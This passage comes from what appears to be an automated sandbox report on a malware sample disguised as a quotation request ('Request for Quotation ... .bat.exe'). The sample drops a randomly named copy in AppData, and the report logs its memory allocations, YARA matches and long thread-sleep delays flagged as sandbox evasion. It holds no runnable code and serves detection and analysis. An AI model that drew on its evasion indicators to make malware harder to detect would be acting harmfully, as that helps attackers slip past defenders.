                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7428, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: 7E30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: 8E30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: 8FE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: 9FE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: 1620000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: 50D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMemory allocated: 77D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMemory allocated: 87D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMemory allocated: 8960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMemory allocated: 9960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMemory allocated: 2690000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMemory allocated: 2820000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMemory allocated: 4820000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599655Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599326Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599107Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597469Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597359Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597139Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597031Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 594720Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 594594Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599891
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599781
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599672
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599541
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599218
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599109
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599000
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598890
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598781
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598672
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598560
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598453
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598344
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598219
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598109
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598000
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597885
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597781
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597672
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597562
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597453
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597344
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597232
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597125
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597016
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596891
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596766
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596656
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596546
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596437
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596328
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596219
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596109
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596000
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595891
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595766
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595641
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595531
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595422
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595312
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595203
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595094
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 594984
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 594875
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 594765
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 594656
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 594547
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4920Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5746Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 664Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeWindow / User API: threadDelayed 1814Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeWindow / User API: threadDelayed 8049Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeWindow / User API: threadDelayed 1284
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeWindow / User API: threadDelayed 8573
                Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1317
                Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1251
                Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 851
                Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1244
                Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1094
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 3480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep count: 4920 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 368Thread sleep count: 216 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7564Thread sleep count: 1814 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -599874s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7564Thread sleep count: 8049 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -599655s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -599326s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -599107s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -599000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -598671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -598344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -598234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -598125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -598015s >= -30000sJump to behavior
